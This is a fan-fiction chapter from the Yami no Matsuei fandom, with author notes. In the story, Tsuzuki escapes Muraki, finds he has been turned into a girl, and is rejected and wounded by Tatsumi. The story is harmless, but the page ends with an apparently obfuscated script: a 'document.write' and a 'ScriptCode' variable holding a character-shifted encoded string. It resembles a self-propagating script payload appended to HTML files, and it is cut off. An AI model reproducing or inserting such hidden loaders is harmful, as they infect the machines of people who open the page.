Yami No Matsuei Fan Fiction ❯ Girl Trouble... ❯ Shatterred beliefs ( Chapter 1 )

[ P - Pre-Teen ]

az: ...... hehe.. I'm not telling the surprise!!! Read... and REVIEW!!! One-shot are fine with me if not getting enough reviews... but for series like this... I demand a lot... and... I've edited this chappie. Already felt there's something missing... but thinks to those who reviewed. To those who haven't... I hoped you're paying it with your internet bills... ;P

A/N: I tried to do to fix any glitch here if I can!! But at some parts, I may not do so since that was my writing style. I always disliked utmost formalities in my fics and I've always write this in manga-anime style of telling... Some trivia: Do you know most best-selling authors DO purposely used wrong grammar in their writing to personify their characters? Think for yourself...


Disclaimer: I don't own Yami no Matsuei nor did I own the tankoubons or the anime. Characters and original excerpt from the fic are copyrights of Matsushita Yoko-sensei. No infringements are intended and no grudge was held during this production. The sky will fall if I wrote something as near as yaoi (and this was thankfully still shonen-ai..)!! Eh..? Did the sky started to crumble? O-uh...


Girl trouble...

Shattered belief

Written by Azzie @ Alienna Azuani @ Yami Azzie

'Damn it!! Why was I so careless..?!!! I should have stayed with him...!!', cried Hisoka as he paced to and fro beside Watari's desk. Watari shook his head at the lad as he moved his attention away from his computer. 'Calm down.. Bon!! You... don't make things more troubling here.... Tatsumi was already making things as tense as it is... He's more worried than you (Watari: And more irritable too...) and also having even put aside his own work to go search for Tsuzuki.. So, Bon.... Just be patient until he comes, okay...'

'But Tsuzuki was already missing for two weeks!! What was I'm doing... I should have been with him!!', cried Hisoka again as Watari patted his shoulders. 'Let's hope that he'll be alright... The least we can do now is to keep calm and kept searching for him!! To me, you are better off than some... Tatsumi, he may act cold to you but I know that he was absolutely anxious for Tsuzuki's safety above everyone else!! I know that for a fact...', said Watari as he spoke with a sad tone.

'What is it... Watari-san?'

Watari shrugged. 'Err... it's nothing!! Just some old recollection... Tatsumi-san had his own reasons when he asked to cease from becoming Tsuzuki's partner... Aaa, don't mind me...', he mumbled as he heard footsteps coming in. 'And that's must be him!!', he gasped as both of them rushed towards Tatsumi. Tatsumi looked up at them and shook his head before any of them could speak. 'He's not anywhere!! Not in Nagasaki, Kyoto or anywhere else!! Unless someone was keeping him prisoner and preventing me from seeing him walking around... and that doesn't help much too!!', sighed Tatsumi as he slumped on a chair.

Watari placed his hand on his shoulder to comfort him. 'Don't blame yourself, Tatsumi... You've tried your best...', he said as Tatsumi clutched his face in frustration. 'But what if it's Muraki's... aah!!!'

'Tsuzuki... where are you...?!!', he whispered to himself in despair...

**

Tsuzuki opened his eyes as he found himself in a strange room. He clutched his head as dizziness started taking over him. 'Oh man... how long have I been unconscious?! It felt like years...', he moaned as he struggled to sit up. (az: Actually, it's just weeks!!! ;P) Oh man... Hisoka would be pissed off! I never thought I'd be out this long after drinking so much saké...

Tsuzuki struggled to stand up as he picked up his coat and walked out of the room, not noticing the white form lying on a couch nearby as he slammed the door shut behind him. Muraki shot up from his long nap as the loud bang woke him up. He immediately rushes to the bedroom to find that his suspiscions were proved right. Tsuzuki had finally woken up from his long slumber and was out from his grasp! Muraki frowned as he placed his hand over his forehead and chuckled.

'Oh, Tsuzuki-san... why did you have to leave so soon? Now I have to go out and search for you!! Outside is no longer safe for you, my dear...'

**

Tsuzuki dashed towards the building as he saw a group of people in front of it, as if preparing for an expedition. Seconds later as he got nearer, he saw Tatsumi as one of the people. Relief overwhelmed his heart as he shouted for his name. Though, his voice sounded strange as it sounded more girlish than usual. Tsuzuki let the thought pass as he ran towards Tatsumi...

~Tatsumi~

I turned around as I heard someone calling to me. Is it... Tsuzuki-san?! But, no... it couldn't be!! This person... was shorter, a little taller than Hisoka but indeed shorter and his voice was not what I called Tsuzuki's voice. But his eyes... it was like Tsuzuki's but it couldn't be possible. Could this be Muraki's trick?

'Tatsumi!! I'm back...! What are you doing?!', said the stranger as he grabbed my arm. I pushed him away. The stranger seemed surprised at this but it's not like I bothered. I have to continue searching for Tsuzuki!!

'Tatsumi... what...' The stranger gasped again as I felt a tinge of guilt towards him. 'Who are you...? Go away!! How did you come to this place? This is not some place where you can come uninvited!!', I said as the stranger looked at me in pained surprise. 'Tatsumi...?! It's me... Tsuzuki...!!', the stranger said in hurtful tone.

'You can't be... You are not Tsuzuki that I know!!', I spat to his face, not realizing that I would regret this actions later...

~Tsuzuki~

I felt a sharp pain in my heart as I backed away from Tatsumi. How could you say that to me... Tatsumi?!!

'You're cruel!! Tatsumi... I never thought you'd treat me like this!! I thought you'd be worried for me... and I had returned as quickly as I could!!', I said as Tatsumi glared at me coldly. I felt another sharp pang as if my heart would shatter into million pieces. I backed away further more...

But, why suddenly Tatsumi seemed to be a lot taller to me...?

Another figure stood away towards the light as Watari came to Tatsumi's side. 'What is it, Tatsumi? I thought you were all set up to find Tsuzuki...', he said as Tatsumi shrugged as he pointed towards me. 'This idiot said that he was Tsuzuki... Not like I'd believe it!', said Tatsumi as Watari turned his glance towards me. Hisoka too had come into the open.

'Watari...? It's me... Tsuzuki, can't you recognize me? Hisoka..?!!', I cried as Watari and Hisoka looked at me with confusion and distrust. I felt tears welling in my eyes as they stared at me like I was someone they don't know. But suddenly, I saw the three of them frown. I turned around to see what was it that they're looking...

**

Muraki was smiling as he walked towards the clearing, towards Tsuzuki's direction. Tsuzuki darted towards him in surprise and anger. 'Muraki...!! What was the meaning of this?!! What have you done to me..?', cried Tsuzuki as Muraki bowed toward him. 'You really wanted to know..?', he hissed as his hands went towards Tsuzuki's shoulders. 'I never thought you'd be so dense... but it can't be helped. Not like you'd expect it to happen...', he said as he kissed Tsuzuki's cheek. At the same time, he roughly pulled off Tsuzuki's black coat, as Tsuzuki stood frozen in front of him...

Chocolate-tinged tresses flew with the wind as it finally rested on Tsuzuki's shoulders. Tsuzuki looked down towards himself as he marveled at this knowledge. 'I had... long hair?', he gasped as his hands shot towards his chest. His eyes widen as he stepped away from Muraki. 'What... did you do...?', gasped Tsuzuki again as he looked at Muraki with painful realization. 'Tsuzuki...', Muraki gasped as he tried reaching up towards him. But Tsuzuki evaded further...

'Now, now... doctor, can you please... leave here with your girlfriend and out of our sight?!! And another thing... what did you do to Tsuzuki?!!', snapped Tatsumi, irritated as Muraki smirked evilly. Tsuzuki turned around towards Tatsumi and shook his head violently. 'Tatsumi...', he gasped out loud. '...!! It's really me... Muraki had done something... I don't know what, but I can't remember... Don't send me away to him!!', plead Tsuzuki again as Tatsumi clenched his fist. 'I said... LEAVE NOW!!!', exclaimed Tatsumi as he sent violent shadows towards Tsuzuki.

Tsuzuki screamed aloud as the shadows hit him. Muraki dashed towards him as he cried out his name. 'TSUZUKI~~!!', he exclaimed as he rushed in to save Tsuzuki. Tatsumi stopped attacking as he heard Muraki's cry...

--

--

Tsuzuki struggled to open his eyes as pain shot all over his body. But moreover he felt someone holding him to his wonder. He pulled away to find in surprise, Muraki holding him as he himself, covered in blood. 'Muraki... why..?!', he gasped as Muraki lifted up his chins. 'There's no way I could let you get hurt, couldn't I? I didn't turn you like this so that you'd get hurt...'

Tsuzuki hastily retreated from him as his heart started to beat up faster. But the action too caused the pain of his body to return afresh into his senses. He looked down towards his severely injured arm as he turned around to face Tatsumi. Tatsumi looked at him with troubled heart as Watari and Hisoka stood stunned by his side. Tsuzuki looked towards Tatsumi in a very painful stare.

Tatsumi's heart seemed to have stopped as the vision he had seen before at the Castle of Candles came to mind. Tsuzuki... is crying blood...!!, he thought even as he realized that the blood was actually coming from the cut on his forehead...

'Tatsumi... You've... hurt me...?!', Tsuzuki gasped, his eyes still conveyed the disbelief and pained surprise towards Tatsumi. The wounds, even as he spoke, healed slowly as it strengthen the fact that this girl was really who she claimed...

'Tsuzuki... I...', Tatsumi stuttered as Tsuzuki shook his head violently, crying now. 'I HATE YOU... TATSUMI!!!', he screamed as the ground around him exploded with such strong burst of force as it headed towards the shinigamis. The powerful surge of power ceased as it reached them as Tsuzuki collapsed in exhaustion. Muraki caught him (or her) as he collapsed to the ground. He smiled as the three shinigami rushed towards them.

'It seemed that our stay here was overdue... Forgive us as we take leave...', said Muraki vanished along with Tsuzuki, in a flock of feathers...

--

--

Tatsumi fell to his knees as the trio arrived to the spot where Muraki disappeared. 'Tsuzuki... I'm sorry...!!', whispered Tatsumi softly.

Watari and Hisoka stomped around in frustration as Muraki escaped them again. 'Aaargh!! He got us again!!', cried Hisoka as Watari looked behind him in surprise. 'Hisoka...! Tatsumi...', he gasped as they darted towards Tatsumi, who have fainted on the ground. Watari sighed as he struggled to carry Tatsumi with Hisoka's help.

'Poor you... you must have not rested ever since Tsuzuki was gone... And this happened...', he sighed as he cursed silently over the crazed doctor that was the cause of this misfortune to happen...

[TBC]


az: Hehe.... I started another series... without finishing another!!! Waaa.... but the plot was clinging on my mind and I can't help....!! Hihihi...

~~

az: Tsuzuki.... someone I guessed, questioned our language...

Tsuzuki: Aah... mind them... I rather face Tatsumi's bragging than here such things...

az: Yeah... not good for health anyway... even if I explained, it makes no point...

Tsuzuki: Yeah... like between a dragon and snapping turtle...

az: Aah... Tsuzuki-san... you were born in the Meiji period!! Get your phrases right!!

~~ document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs